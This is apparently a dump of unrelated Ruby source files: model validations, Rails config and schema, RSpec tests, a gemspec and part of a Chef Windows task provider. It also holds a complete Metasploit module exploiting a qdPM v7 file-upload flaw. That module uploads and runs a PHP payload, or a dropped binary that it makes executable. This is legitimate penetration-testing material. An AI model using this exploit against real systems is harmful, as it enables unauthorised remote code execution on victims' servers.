welcome_body = "#{site_short_name} is the #{aca_state_name}'s on-line marketplace to shop, compare, and select health insurance that meets your health needs and budgets."
mailbox = Inbox.create(recipient: self)
mailbox.messages.create(subject: welcome_subject, body: welcome_body, from: "#{site_short_name}")
end
def update_full_name
full_name
end
def no_changing_my_user
if self.persisted? && self.user_id_changed?
old_user, new_user= self.user_id_change
return if old_user.blank?
if (old_user != new_user)
errors.add(:base, "you may not change the user_id of a person once it has been set and saved")
end
end
end
# Verify basic date rules
def date_functional_validations
date_of_death_is_blank_or_past
date_of_death_follows_date_of_birth
end
def date_of_death_is_blank_or_past
return unless self.date_of_death.present?
errors.add(:date_of_death, "future date: #{self.date_of_death} is invalid date of death") if TimeKeeper.date_of_record < self.date_of_death
end
def date_of_death_follows_date_of_birth
return unless self.date_of_death.present? && self.dob.present?
if self.date_of_death < self.dob
errors.add(:date_of_death, "date of death cannot preceed date of birth")
errors.add(:dob, "date of birth cannot follow date of death")
end
end
def consumer_fields_validations
if @is_consumer_role.to_s == "true" #&& consumer_role.is_applying_coverage.to_s == "true" #only check this for consumer flow.
citizenship_validation
native_american_validation
incarceration_validation
end
end
def native_american_validation
self.errors.add(:base, "American Indian / Alaskan Native status is required.") if indian_tribe_member.to_s.blank?
if !tribal_id.present? && @us_citizen == true && @indian_tribe_member == true
self.errors.add(:base, "Tribal id is required when native american / alaskan native is selected")
elsif tribal_id.present? && !tribal_id.match("[0-9]{9}")
self.errors.add(:base, "Tribal id must be 9 digits")
end
end
def citizenship_validation
if @us_citizen.to_s.blank?
self.errors.add(:base, "Citizenship status is required.")
elsif @us_citizen == false && @eligible_immigration_status.nil?
self.errors.add(:base, "Eligible immigration status is required.")
elsif @us_citizen == true && @naturalized_citizen.nil?
self.errors.add(:base, "Naturalized citizen is required.")
end
end
def incarceration_validation
self.errors.add(:base, "Incarceration status is required.") if is_incarcerated.to_s.blank?
end
end
| 35.590957 | 215 | 0.699176 |
e8c163010f8ebdd25a35caf41ca47a354815848d | 145 | # AbstractExpression: an abstract representation of a command
class Expression
def |(other)
Or.new(self, other)
end
def &(other)
And.new(self, other)
end
end
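# Usage sketch (assumes Or and And composite classes are defined elsewhere):
#   rule = expr_a & (expr_b | expr_c)   # => And.new(expr_a, Or.new(expr_b, expr_c))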
| 13.181818 | 31 | 0.655172 |
7af84b39077e5fbeabe6402ef64abaab2fec4a09 | 7,500 | require 'spec_helper'
module Pageflow
describe VideoFilesHelper do
describe '#mobile_poster_image_div' do
it 'has default css classes' do
html = helper.mobile_poster_image_div
expect(html).to have_selector('div.background.background_image')
end
context 'no poster' do
it 'has video_poster_none class' do
html = helper.mobile_poster_image_div
expect(html).to have_selector('div.video_poster_none')
end
end
context 'with mobile_poster_image_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'mobile_poster_image_id' => 98
)
expect(html).to have_selector('div.image_98')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'mobile_poster_image_id' => 98,
'mobile_poster_image_x' => 40,
'mobile_poster_image_y' => 40
)
expect(html).to have_selector('div[style="background-position: 40% 40%;"]')
end
end
context 'with poster_image_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'poster_image_id' => 97
)
expect(html).to have_selector('div.image_97')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'poster_image_id' => 98,
'poster_image_x' => 30,
'poster_image_y' => 30
)
expect(html).to have_selector('div[style="background-position: 30% 30%;"]')
end
end
context 'with video_file_id' do
it 'has the id in the class' do
html = helper.mobile_poster_image_div(
'video_file_id' => 96
)
expect(html).to have_selector('div.video_poster_96')
end
it 'has optional background-position' do
html = helper.mobile_poster_image_div(
'video_file_id' => 96,
'video_file_x' => 20,
'video_file_y' => 20
)
expect(html).to have_selector('div[style="background-position: 20% 20%;"]')
end
end
end
describe '#poster_image_tag' do
context 'with separate poster image' do
it 'includes the poster image url' do
video_file = create(:video_file)
poster_image = create(:image_file)
html = helper.poster_image_tag(video_file.id, poster_image.id)
expect(html).to include(poster_image.attachment.url(:medium))
expect(html).to include(poster_image.attachment.url(:print))
end
end
context 'with unknown poster image id' do
it 'includes the video file poster url' do
video_file = create(:video_file)
html = helper.poster_image_tag(video_file.id, 'unknown')
expect(html).to include(video_file.poster.url(:medium))
expect(html).to include(video_file.poster.url(:print))
end
end
end
describe '#video_file_video_tag' do
it 'sets class as css class' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, class: 'large')
expect(html).to have_selector('video.large')
end
it 'passes controls option to tag' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, controls: 'controls')
expect(html).to have_selector('video[controls]')
end
it 'sets preload to metadata if preload options is true' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, preload: true)
expect(html).to have_selector('video[preload=metadata]')
end
it 'includes sources and high sources for the video file' do
video_file = build(:video_file, id: 200)
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('source[src*="200/medium.mp4"]')
expect(html).to have_selector('source[data-high-src*="200/high.mp4"]')
end
it 'includes unique id in source urls' do
video_file = build(:video_file)
html = helper.video_file_video_tag(video_file, unique_id: 'something-unique')
expect(html).to have_selector('source[src*="something-unique"]')
end
it 'sets data-poster and data-large-poster attribute by video file poster' do
video_file = build(:video_file, poster_file_name: 'poster.jpg')
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('video[data-poster*="medium/poster"]')
expect(html).to have_selector('video[data-large-poster*="large/poster"]')
end
it 'sets data-poster and data-large-poster attribute by custom poster image' do
video_file = build(:video_file)
image_file = create(:image_file)
html = helper.video_file_video_tag(video_file, poster_image_id: image_file.id)
expect(html).to have_selector('video[data-poster*="medium/image"]')
expect(html).to have_selector('video[data-large-poster*="large/image"]')
end
it 'sets data-mobile-poster and data-mobile-large-poster attribute by custom mobile image' do
video_file = build(:video_file)
image_file = create(:image_file)
html = helper.video_file_video_tag(video_file, mobile_poster_image_id: image_file.id)
expect(html).to have_selector('video[data-mobile-poster*="medium/image"]')
expect(html).to have_selector('video[data-mobile-large-poster*="large/image"]')
end
it 'sets width and height data attributes' do
video_file = build(:video_file, width: 100, height: 50)
html = helper.video_file_video_tag(video_file)
expect(html).to have_selector('video[data-width="100"][data-height="50"]')
end
end
describe '#video_file_script_tag' do
it 'renders script tag containing video tag html' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script', visible: false, text: /<video/)
end
it 'sets data-template attribute' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script[data-template=video]', visible: false)
end
it 'sets width and height data attributes' do
video_file = create(:video_file, width: 100, height: 50)
html = helper.video_file_script_tag(video_file.id)
expect(html).to have_selector('script[data-video-width="100"][data-video-height="50"]', visible: false)
end
it 'passes options to video tag helper' do
video_file = create(:video_file)
html = helper.video_file_script_tag(video_file.id, controls: true)
expect(html).to have_selector('script', visible: false, text: /controls/)
end
end
describe '#video_file_non_js_link' do
it 'renders link to short video file path' do
entry = create(:entry)
video_file = create(:video_file, id: 100)
expect(helper).to receive(:short_video_file_path).with(entry, video_file).and_return('/video')
html = helper.video_file_non_js_link(entry, video_file.id)
expect(html).to have_selector('a[href*="/video"]')
end
end
end
end
| 32.051282 | 111 | 0.639867 |
7a0052d536bbeddc5af04e6dcd90936ac34c062a | 1,457 | Gem::Specification.new do |s|
s.name = 'logstash-output-s3'
s.version = '4.3.3'
s.licenses = ['Apache-2.0']
s.summary = "Sends Logstash events to the Amazon Simple Storage Service"
s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
s.authors = ["Elastic"]
s.email = '[email protected]'
s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
s.require_paths = ["lib"]
# Files
s.files = Dir["lib/**/*","spec/**/*","*.gemspec","*.md","CONTRIBUTORS","Gemfile","LICENSE","NOTICE.TXT", "vendor/jar-dependencies/**/*.jar", "vendor/jar-dependencies/**/*.rb", "VERSION", "docs/**/*"]
# Tests
s.test_files = s.files.grep(%r{^(test|spec|features)/})
# Special flag to let us know this is actually a logstash plugin
s.metadata = { "logstash_plugin" => "true", "logstash_group" => "output" }
# Gem dependencies
s.add_runtime_dependency "logstash-core-plugin-api", ">= 1.60", "<= 2.99"
s.add_runtime_dependency 'logstash-mixin-aws', '>= 4.3.0'
s.add_runtime_dependency "concurrent-ruby"
s.add_runtime_dependency 'stud', '~> 0.0.22'
s.add_development_dependency 'logstash-devutils'
s.add_development_dependency 'logstash-input-generator'
s.add_development_dependency 'logstash-codec-line'
end
| 48.566667 | 205 | 0.669183 |
b953a7fbcf08490dd36088d937d0be81e63bd3be | 270 | Rails.application.routes.draw do
namespace :api do
resources :images do
resources :comments
end
end
resources :comments
resources :images
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
end
| 19.285714 | 102 | 0.72963 |
87b3bf596ed4fe695d330c2c84bb07da1d950de2 | 139 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_tripify_session'
| 34.75 | 77 | 0.805755 |
7ab890d457ed2d008147ea424a7bf52cbf82606a | 2,516 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20140919152929) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "comments", force: true do |t|
t.text "body"
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "comments", ["response_id"], name: "index_comments_on_response_id", using: :btree
add_index "comments", ["user_id"], name: "index_comments_on_user_id", using: :btree
create_table "questions", force: true do |t|
t.string "image_path"
t.string "title"
t.text "caption"
t.string "slug"
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "questions", ["user_id"], name: "index_questions_on_user_id", using: :btree
create_table "responses", force: true do |t|
t.text "content"
t.integer "user_id"
t.integer "question_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "responses", ["question_id"], name: "index_responses_on_question_id", using: :btree
add_index "responses", ["user_id"], name: "index_responses_on_user_id", using: :btree
create_table "users", force: true do |t|
t.string "name"
t.string "email"
t.string "password_digest"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "votes", force: true do |t|
t.integer "user_id"
t.integer "response_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "votes", ["response_id"], name: "index_votes_on_response_id", using: :btree
add_index "votes", ["user_id"], name: "index_votes_on_user_id", using: :btree
end
| 34.465753 | 95 | 0.713434 |
b9a5b03fc9e56b49f1765a66e3c734e090b7ec6f | 592 | # frozen_string_literal: true
module Importer
module Factory
extend ActiveSupport::Autoload
eager_autoload do
autoload :ObjectFactory
autoload :StringLiteralProcessor
autoload :ConferenceItemFactory
autoload :DatasetFactory
autoload :GenericWorkFactory
autoload :JournalArticleFactory
autoload :PublishedWorkFactory
autoload :ThesisFactory
autoload :BaseFactory
end
# @param [#to_s] First (Xxx) portion of an "XxxFactory" constant
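    # @example A hypothetical lookup (the model name "Dataset" is shown only for illustration)
    #   Importer::Factory.for('Dataset') # => Importer::Factory::DatasetFactory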
def self.for(model_name)
const_get "#{model_name}Factory"
end
end
end
| 23.68 | 68 | 0.716216 |
7ad3eea8704f8aca258c998a6e3ea2c5dd0c3526 | 116 | require 'rails_helper'
module CannedMeat
RSpec.describe SubscriptionsController, type: :controller do
end
end
| 14.5 | 62 | 0.801724 |
18dffb31a75a1388164ca41b8fb94f7ccd4a3786 | 963 | # frozen_string_literal: true
# Copyright (c) 2018 Continental Automotive GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module CoreExtensions
module Object
# Global file lock
module Flock
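      # Minimal usage sketch; the lock file path below is illustrative, not required:
      #
      #   with_flock('/tmp/my_task.lock') do
      #     # work that must not run concurrently across processes
      #   end
      #
      # The ensure block releases the lock even if the yielded block raises.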
def with_flock(lock_file = '/tmp/global.lock')
file_lock = File.open(lock_file, File::RDWR | File::CREAT, 0o644)
file_lock.flock(File::LOCK_EX)
yield
ensure
file_lock.flock(File::LOCK_UN)
end
end
end
end
| 31.064516 | 74 | 0.719626 |
e845b72976a5a5e2f413a3238b59aa3ebe7a86f8 | 5,410 | # encoding: utf-8
require 'spec_helper'
require 'backgrounder/workers/store_asset'
RSpec.describe CarrierWave::Workers::StoreAsset do
let(:fixtures_path) { File.expand_path('../fixtures/images', __FILE__) }
let(:worker_class) { CarrierWave::Workers::StoreAsset }
let(:user) { double('User') }
let!(:worker) { worker_class.new(user, '22', :image) }
describe ".perform" do
it 'creates a new instance and calls perform' do
args = [user, '22', :image]
expect(worker_class).to receive(:new).with(*args).and_return(worker)
expect_any_instance_of(worker_class).to receive(:perform)
worker_class.perform(*args)
end
end
describe "#perform" do
let(:image) { double('UserAsset') }
before do
allow(image).to receive(:root).once.and_return(File.expand_path('..', __FILE__))
allow(image).to receive(:cache_dir).once.and_return('fixtures')
allow(user).to receive(:image_tmp).twice.and_return('images/test.jpg')
allow(user).to receive(:find).with('22').once.and_return(user)
allow(user).to receive(:image).once.and_return(image)
allow(user).to receive(:process_image_upload=).with(true).once
allow(user).to receive(:image=).once
allow(user).to receive(:image_tmp=).with(nil).once
end
it 'removes tmp directory on success' do
expect(FileUtils).to receive(:rm_r).with(fixtures_path, :force => true).once
expect(user).to receive(:save!).once.and_return(true)
worker.perform
end
it 'does not remove the tmp directory if save! fails' do
expect(FileUtils).to receive(:rm_r).never
expect(user).to receive(:save!).once.and_return(false)
worker.perform
end
it 'sets the cache_path' do
expect(user).to receive(:save!).once.and_return(false)
worker.perform
expect(worker.cache_path).to eql(fixtures_path + '/test.jpg')
end
it 'sets the tmp_directory' do
expect(user).to receive(:save!).once.and_return(false)
worker.perform
expect(worker.tmp_directory).to eql(fixtures_path)
end
end
describe '#perform with args' do
let(:admin) { double('Admin') }
let(:image) { double('AdminAsset') }
let(:worker) { worker_class.new }
before do
allow(image).to receive(:root).once.and_return(File.expand_path('..', __FILE__))
allow(image).to receive(:cache_dir).once.and_return('fixtures')
allow(admin).to receive(:avatar_tmp).twice.and_return('images/test.jpg')
allow(admin).to receive(:find).with('23').once.and_return(admin)
allow(admin).to receive(:avatar).once.and_return(image)
allow(admin).to receive(:process_avatar_upload=).with(true).once
allow(admin).to receive(:avatar=).once
allow(admin).to receive(:avatar_tmp=).with(nil).once
allow(admin).to receive(:save!).once.and_return(false)
worker.perform admin, '23', :avatar
end
it 'sets klass' do
expect(worker.klass).to eql(admin)
end
it 'sets column' do
expect(worker.id).to eql('23')
end
it 'sets id' do
expect(worker.column).to eql(:avatar)
end
end
describe '#store_directories' do
let(:record) { double('Record') }
context 'cache_path' do
it 'sets the cache_path correctly if a full path is set for the cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = '/Users/lar/Sites/bunker/tmp/uploads'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.cache_path).to eql('/Users/lar/Sites/bunker/tmp/uploads/images/test.jpg')
end
it 'sets the cache_path correctly if a partial path is set for cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = 'uploads/tmp'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.cache_path).to eql('/Users/lar/Sites/bunker/public/uploads/tmp/images/test.jpg')
end
end
context 'tmp_directory' do
it 'sets the tmp_directory correctly if a full path is set for the cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = '/Users/lar/Sites/bunker/tmp/uploads'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.tmp_directory).to eql('/Users/lar/Sites/bunker/tmp/uploads/images')
end
it 'sets the tmp_directory correctly if a partial path is set for cache_dir' do
root = '/Users/lar/Sites/bunker/public'
cache_dir = 'uploads/tmp'
asset = double(:cache_dir => cache_dir, :root => root)
expect(record).to receive(:image).and_return(asset)
expect(record).to receive(:image_tmp).and_return('images/test.jpg')
worker.send :store_directories, record
expect(worker.tmp_directory).to eql('/Users/lar/Sites/bunker/public/uploads/tmp/images')
end
end
end
end
| 39.202899 | 102 | 0.669316 |
abea50ccb76b960237f058fa02111629ebee5c9e | 837 | module MetricFu
class Roodi < Generator
def self.verify_dependencies!
`roodi --help`
raise 'sudo gem install roodi # if you want the roodi tasks' unless $?.success?
end
def emit
files_to_analyze = MetricFu.roodi[:dirs_to_roodi].map{|dir| Dir[File.join(dir, "**/*.rb")] }
@output = `roodi #{files_to_analyze.join(" ")}`
end
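    # The parser in #analyze expects roodi output shaped roughly like
    #   path/to/file.rb:12 - <problem description>
    # with one line per issue, followed by a summary line that is popped off as the total.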
def analyze
@matches = @output.chomp.split("\n").map{|m| m.split(" - ") }
total = @matches.pop
@matches.reject! {|array| array.empty? }
@matches.map! do |match|
file, line = match[0].split(':')
problem = match[1]
{:file => file, :line => line, :problem => problem}
end
@roodi_results = {:total => total, :problems => @matches}
end
def to_h
{:roodi => @roodi_results}
end
end
end
| 26.15625 | 98 | 0.572282 |
ff4b154ed183826bdb7146ca90d5b1d2c02ad441 | 8,592 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in qdPM - a web-based project management
software. The user profile's photo upload feature can be abused to upload any
arbitrary file onto the victim server machine, which allows remote code execution.
Please note in order to use this module, you must have a valid credential to sign
in.
},
'License' => MSF_LICENSE,
'Author' =>
[
'loneferret', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '82978'],
['EDB', '19154']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => %w{ linux php },
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 14 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with'])
], self.class)
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
major, minor = $1, $2
return Exploit::CheckCode::Appears if (major+minor).to_i <= 70
end
return Exploit::CheckCode::Safe
end
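  # Builds the PHP dropper used by the Linux target (a sketch of what the generated
  # code does): base64-decode the embedded payload, write it to fname, chmod it 777
  # and execute it on the target.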
def get_write_exec_payload(fname, data)
p = Rex::Text.encode_base64(generate_payload_exe)
php = %Q|
<?php
$f = fopen("#{fname}", "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
exec("chmod 777 #{fname}");
exec("#{fname}");
?>
|
php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')
return php
end
def on_new_session(cli)
if cli.type == "meterpreter"
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end
@clean_files.each do |f|
print_warning("Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("Unable to remove #{f}: #{e.message}")
end
end
end
def login(base, username, password)
# Login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/index.php/home/login"),
'vars_post' => {
'login[email]' => username,
'login[password]' => password,
'http_referer' => ''
},
# This needs to be set, otherwise we get two cookies... I don't need two cookies.
'cookie' => "qdpm=#{Rex::Text.rand_text_alpha(27)}",
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}/#{base}/index.php/home/login"
}
})
cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : ''
return {} if cookie.empty?
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data
vprint_status("Enumerating user data")
res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
})
return {} if not res
if res.code == 404
print_error("#{username} does not actually have a 'myAccount' page")
return {}
end
b = res.body
user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''
opts = {
'cookie' => cookie,
'user_id' => user_id,
'group_id' => group_id,
'user_active' => user_active
}
return opts
end
def upload_php(base, opts)
fname = opts['filename']
php_payload = opts['data']
user_id = opts['user_id']
group_id = opts['group_id']
user_active = opts['user_active']
username = opts['username']
email = opts['email']
cookie = opts['cookie']
data = Rex::MIME::Message.new
data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')
data.add_part('put', nil, nil, 'form-data; name="sf_method"')
data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')
data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')
data.add_part('', nil, nil, 'form-data; name="users[skin]"')
data.add_part(username, nil, nil, 'form-data; name="users[name]"')
data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
data.add_part('', nil, nil, 'form-data; name="preview_photo"')
data.add_part(email, nil, nil, 'form-data; name="users[email]"')
data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')
data.add_part('', nil, nil, 'form-data; name="new_password"')
post_data = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie,
'headers' => {
'Origin' => "http://#{rhost}",
'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
}
})
return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
end
def exec_php(base, opts)
cookie = opts['cookie']
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
res = send_request_cgi({
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
'cookie' => cookie
})
if not res
print_error("Unable to request the file")
return
end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty?
print_error("Unable to extract the real filename")
return
end
# Now that we have the filename, request it
print_status("Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler
end
def exploit
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass)
if opts.empty?
print_error("Login unsuccessful")
return
end
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
@clean_files = [php_fname]
case target['Platform']
when 'php'
p = "<?php #{payload.encoded} ?>"
when 'linux'
bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
@clean_files << bin_name
bin = generate_payload_exe
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end
print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user,
'filename' => php_fname,
'data' => p
})
uploader = upload_php(base, opts)
if not uploader
print_error("Unable to upload")
return
end
print_status("Executing '#{php_fname}'")
exec_php(base, opts)
end
end
| 31.704797 | 154 | 0.561918 |
ff0d338b4805b1802286afcc6830bfe1a9b21427 | 28,083 | #
# Author:: Nimisha Sharad (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../mixin/shell_out"
require "rexml/document" unless defined?(REXML::Document)
require "iso8601" if ChefUtils.windows?
require_relative "../provider"
require_relative "../util/path_helper"
require "win32/taskscheduler" if ChefUtils.windows?
class Chef
class Provider
class WindowsTask < Chef::Provider
include Chef::Mixin::ShellOut
if ChefUtils.windows?
include Win32
provides :windows_task
MONTHS = {
JAN: TaskScheduler::JANUARY,
FEB: TaskScheduler::FEBRUARY,
MAR: TaskScheduler::MARCH,
APR: TaskScheduler::APRIL,
MAY: TaskScheduler::MAY,
JUN: TaskScheduler::JUNE,
JUL: TaskScheduler::JULY,
AUG: TaskScheduler::AUGUST,
SEP: TaskScheduler::SEPTEMBER,
OCT: TaskScheduler::OCTOBER,
NOV: TaskScheduler::NOVEMBER,
DEC: TaskScheduler::DECEMBER,
}.freeze
DAYS_OF_WEEK = { MON: TaskScheduler::MONDAY,
TUE: TaskScheduler::TUESDAY,
WED: TaskScheduler::WEDNESDAY,
THU: TaskScheduler::THURSDAY,
FRI: TaskScheduler::FRIDAY,
SAT: TaskScheduler::SATURDAY,
SUN: TaskScheduler::SUNDAY }.freeze
WEEKS_OF_MONTH = {
FIRST: TaskScheduler::FIRST_WEEK,
SECOND: TaskScheduler::SECOND_WEEK,
THIRD: TaskScheduler::THIRD_WEEK,
FOURTH: TaskScheduler::FOURTH_WEEK,
}.freeze
DAYS_OF_MONTH = {
1 => TaskScheduler::TASK_FIRST,
2 => TaskScheduler::TASK_SECOND,
3 => TaskScheduler::TASK_THIRD,
4 => TaskScheduler::TASK_FOURTH,
5 => TaskScheduler::TASK_FIFTH,
6 => TaskScheduler::TASK_SIXTH,
7 => TaskScheduler::TASK_SEVENTH,
8 => TaskScheduler::TASK_EIGHTH,
9 => TaskScheduler::TASK_NINETH,
10 => TaskScheduler::TASK_TENTH,
11 => TaskScheduler::TASK_ELEVENTH,
12 => TaskScheduler::TASK_TWELFTH,
13 => TaskScheduler::TASK_THIRTEENTH,
14 => TaskScheduler::TASK_FOURTEENTH,
15 => TaskScheduler::TASK_FIFTEENTH,
16 => TaskScheduler::TASK_SIXTEENTH,
17 => TaskScheduler::TASK_SEVENTEENTH,
18 => TaskScheduler::TASK_EIGHTEENTH,
19 => TaskScheduler::TASK_NINETEENTH,
20 => TaskScheduler::TASK_TWENTIETH,
21 => TaskScheduler::TASK_TWENTY_FIRST,
22 => TaskScheduler::TASK_TWENTY_SECOND,
23 => TaskScheduler::TASK_TWENTY_THIRD,
24 => TaskScheduler::TASK_TWENTY_FOURTH,
25 => TaskScheduler::TASK_TWENTY_FIFTH,
26 => TaskScheduler::TASK_TWENTY_SIXTH,
27 => TaskScheduler::TASK_TWENTY_SEVENTH,
28 => TaskScheduler::TASK_TWENTY_EIGHTH,
29 => TaskScheduler::TASK_TWENTY_NINTH,
30 => TaskScheduler::TASK_THIRTYETH,
31 => TaskScheduler::TASK_THIRTY_FIRST,
}.freeze
PRIORITY = { "critical" => 0, "highest" => 1, "above_normal_2" => 2 , "above_normal_3" => 3, "normal_4" => 4,
"normal_5" => 5, "normal_6" => 6, "below_normal_7" => 7, "below_normal_8" => 8, "lowest" => 9, "idle" => 10 }.freeze
def load_current_resource
@current_resource = Chef::Resource::WindowsTask.new(new_resource.name)
task = TaskScheduler.new(new_resource.task_name, nil, "\\", false)
@current_resource.exists = task.exists?(new_resource.task_name)
if @current_resource.exists
task.get_task(new_resource.task_name)
@current_resource.task = task
pathed_task_name = new_resource.task_name.start_with?('\\') ? new_resource.task_name : "\\#{new_resource.task_name}"
@current_resource.task_name(pathed_task_name)
end
@current_resource
end
action :create do
set_command_and_arguments if new_resource.command
if current_resource.exists
logger.trace "#{new_resource} task exist."
unless (task_needs_update?(current_resource.task)) || (new_resource.force)
logger.info "#{new_resource} task does not need updating and force is not specified - nothing to do"
return
end
            # if start_day and start_time are not set by the user, the current date and time are set when updating any property
set_start_day_and_time unless new_resource.frequency == :none
update_task(current_resource.task)
else
basic_validation
set_start_day_and_time
